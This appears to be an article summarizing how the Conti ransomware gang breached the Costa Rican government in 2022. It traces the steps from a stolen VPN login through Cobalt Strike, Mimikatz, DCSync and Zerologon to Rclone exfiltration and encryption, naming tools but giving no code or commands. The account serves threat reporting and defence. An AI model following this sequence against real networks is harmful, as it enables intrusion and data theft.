More details are now available about the Conti ransomware gang that breached the Costa Rican government. This new information shows the attack's precision & the speed of moving from initial access to the final stage of encrypting devices. This is the last attack from the Conti ransomware operation before the group transitioned to a different form of organization that relies on multiple cells working with other gangs.
Conti emerged in 2020, and made a quick impact by attacking both private and public sector organizations, including local governments, US schools, and national healthcare systems. On April 11, 2022, Conti carried out a large scale attack on the Costa Rican government, which crippled the government's networks.
“A report from cyber intelligence company Advanced Intelligence (AdvIntel) details the Russian hackers’ steps from initial foothold to exfiltrating 672GB of data on April 15 and executing the ransomware” (Bleeping Computer, 2022).
Conti actors were able to breach Costa Rica’s Ministry of Finance for initial access. A group members who goes by “MemberX” gained access to a VPN connection using stolen credentials. The threat actors set up more than 10 Cobalt Strike beacons during the early stages of the attack. The VPN account was used to deploy encrypted forms of Cobalt Strike to evade detection.
“After gaining local network domain administrator access, the intruder used the Nltest command-line tool to enumerate domain trust relationships. Next, they scanned the network for file shares using ShareFinder and AdFind utilities” (Bleeping Computer, 2022). MemberX used Cobalt Strike backdoor channels to download and fileshare output to a local machine. The attacker was able to access administrative shares where they uploaded a Cobalt Strike DLL beacon and then ran it using the PsExec tool for remote file execution.
Mimikatz was used post-exploitation to steal credentials. The malware collected login passwords and NTDS hashes for local users, including local admin, domain, and enterprise administrator hashes. “The researchers say that Conti operators leveraged Mimikatz to run a DCSync and Zerologon attack that gave them access to every host on Costa Rica’s interconnected networks” (Bleeping Computer, 2022). The Atera remote access tool was also installed on hosts for added persistence. “The adversaries pinged the whole network and re-scanned the network domain trusts, leveraging enterprise administrator credentials with ShareFinder and compiling a list of all corporate assets and databases available under their new elevated privileges” - AdvIntel
Data was stolen using Rclone, a command-line program that can manage files on multiple cloud storage services. Conti used it specifically to upload data to the MEGA file hosting service.
Conti posted their ransom demands on their leak site, the initial demand of $10 million was later increased to $20 million after Costa Rica refused to pay. While the public facing website displayed higher demands, internal communications acquired by AdvIntel showed actual negotiations were below $1 million dollars.
Conti’s attack on the Costa Rican government relied on misconfigured administrative shares, which helped the attacker move to domain trusts. Costa Rica was forced to declare a national emergency on May 8, 2022, and some agencies didn’t recover services until early June.
After its internal communications were leaked and its source code was revealed, Conti shut down all sites used for negotiation and took their leak site offline. The cybercriminals have likely dispersed into other ransomware operations, including Quantum, Hive, AvosLocker, BlackCat, and HelloKitty. Conti has also been linked to Karakurt, BlackByte, and the Bazarcall collective.